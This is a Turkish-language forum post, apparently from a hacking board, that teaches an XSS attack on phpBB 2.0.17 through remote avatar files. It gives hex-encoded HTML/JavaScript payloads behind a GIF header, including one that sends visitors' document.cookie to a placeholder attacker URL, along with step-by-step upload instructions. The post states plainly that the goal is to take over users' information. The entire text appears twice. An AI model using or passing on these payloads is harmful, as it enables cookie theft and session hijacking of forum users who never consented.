Resources
New member
Phpbb 2.0.17 forumlardaki (önceki sürümlerdede işe yarayabilir) gif,jpg formatından kaynaklanan bir bug ile kullanıcıların bilgilerini ele geçirebilirsiniz.
Avatarlar için uzaktan çağrılan bir urlnin içine javascript kodlarının hex halini ekleyerek mesaj attığınız sayfalardaki kullanıclar o sayfaya giriş yaptığında belirttiğiniz javascript kodu çalışmaktadır.
Bu
<HTML><HEAD><script>alert(document.cookie);</SCRIPT></HEAD></HTML>
kodunun hex hali aşağıdadır.Hex türüne dönüştürmek için hex workshop programını kullanabilirsiniz.
47 49 46 38 39 61 01 00 01 00 3C 48 54 4D 4C 3E 3C 48 45 41 44 3E 3C 53 43 52 49 50 54 3E 61 6C 65
72 74 28 64 6F 63 75 6D 65 6E 74 2E 63 6F 6F 6B 69 65 29 3B 3C 2F 53 43 52 49 50 54 3E 3C 2F 48 45
41 44 3E 3C 2F 48 54 4D 4C 3E
Bu hex kodunu bir metin belgesine yazıp gif,jpg formatında kaydediceksiniz.Bu koddaki amaç kullanıcının cookilerini uyarı penceresinde göstermesidir.Bu kod ile siteye herhangi bir zarar veremezsiniz.İstediğiniz javascript kodununu hex formatına çevirip anlattığım işlemleri yaparak kullanıcı bilgilerini elegeçirebilirsiniz.
Kaydettiğiniz bu dosyayı bir hosta atın ve Avatar link çağırma yerine http://siteniz.com/dosya.jpg şeklinde yazın ve upload edin.
Mesaj attığınız her sayfaya giren kullanıcı ekrandaki bir pencere içinde cookilerini görecek.
Bazı örnekler:
<html><script>document.location='http://www.sizinsiteniz.com/xss/?'+escape(document.cookie)</script></html>
3C 68 74 6D 6C 3E 3C 73 63 72 69 70
74 3E 64 6F 63 75 6D 65 6E 74 2E 6C
6F 63 61 74 69 6F 6E 3D 27 68 74 74
70 3A 2F 2F 77 77 77 2E 73 69 7A 69
6E 73 69 74 65 6E 69 7A 2E 63 6F 6D
2F 78 73 73 2F 3F 27 2B 65 73 63 61
70 65 28 64 6F 63 75 6D 65 6E 74 2E
63 6F 6F 6B 69 65 29 3C 2F 73 63 72
69 70 74 3E 3C 2F 68 74 6D 6C 3E
<HTML><script>alert("XSS")</SCRIPT></HTML>
3C 48 54 4D 4C 3E 3C 53 43 52 49
50 54 3E 61 6C 65 72 74 28 22 58
53 53 22 29 3C 2F 53 43 52 49 50
54 3E 3C 2F 48 54 4D 4C 3E
Bu şekilde örnekler daha çoğaltılabilir istediğiniz js kodunu hexleyerek bu tarz değerleri görebilirsiniz.
Kaynak : http://www.securityfocus.com/archive/1/414320/30/0/threaded
Avatarlar için uzaktan çağrılan bir urlnin içine javascript kodlarının hex halini ekleyerek mesaj attığınız sayfalardaki kullanıclar o sayfaya giriş yaptığında belirttiğiniz javascript kodu çalışmaktadır.
Bu
<HTML><HEAD><script>alert(document.cookie);</SCRIPT></HEAD></HTML>
kodunun hex hali aşağıdadır.Hex türüne dönüştürmek için hex workshop programını kullanabilirsiniz.
47 49 46 38 39 61 01 00 01 00 3C 48 54 4D 4C 3E 3C 48 45 41 44 3E 3C 53 43 52 49 50 54 3E 61 6C 65
72 74 28 64 6F 63 75 6D 65 6E 74 2E 63 6F 6F 6B 69 65 29 3B 3C 2F 53 43 52 49 50 54 3E 3C 2F 48 45
41 44 3E 3C 2F 48 54 4D 4C 3E
Bu hex kodunu bir metin belgesine yazıp gif,jpg formatında kaydediceksiniz.Bu koddaki amaç kullanıcının cookilerini uyarı penceresinde göstermesidir.Bu kod ile siteye herhangi bir zarar veremezsiniz.İstediğiniz javascript kodununu hex formatına çevirip anlattığım işlemleri yaparak kullanıcı bilgilerini elegeçirebilirsiniz.
Kaydettiğiniz bu dosyayı bir hosta atın ve Avatar link çağırma yerine http://siteniz.com/dosya.jpg şeklinde yazın ve upload edin.
Mesaj attığınız her sayfaya giren kullanıcı ekrandaki bir pencere içinde cookilerini görecek.
Bazı örnekler:
<html><script>document.location='http://www.sizinsiteniz.com/xss/?'+escape(document.cookie)</script></html>
3C 68 74 6D 6C 3E 3C 73 63 72 69 70
74 3E 64 6F 63 75 6D 65 6E 74 2E 6C
6F 63 61 74 69 6F 6E 3D 27 68 74 74
70 3A 2F 2F 77 77 77 2E 73 69 7A 69
6E 73 69 74 65 6E 69 7A 2E 63 6F 6D
2F 78 73 73 2F 3F 27 2B 65 73 63 61
70 65 28 64 6F 63 75 6D 65 6E 74 2E
63 6F 6F 6B 69 65 29 3C 2F 73 63 72
69 70 74 3E 3C 2F 68 74 6D 6C 3E
<HTML><script>alert("XSS")</SCRIPT></HTML>
3C 48 54 4D 4C 3E 3C 53 43 52 49
50 54 3E 61 6C 65 72 74 28 22 58
53 53 22 29 3C 2F 53 43 52 49 50
54 3E 3C 2F 48 54 4D 4C 3E
Bu şekilde örnekler daha çoğaltılabilir istediğiniz js kodunu hexleyerek bu tarz değerleri görebilirsiniz.
Kaynak : http://www.securityfocus.com/archive/1/414320/30/0/threaded
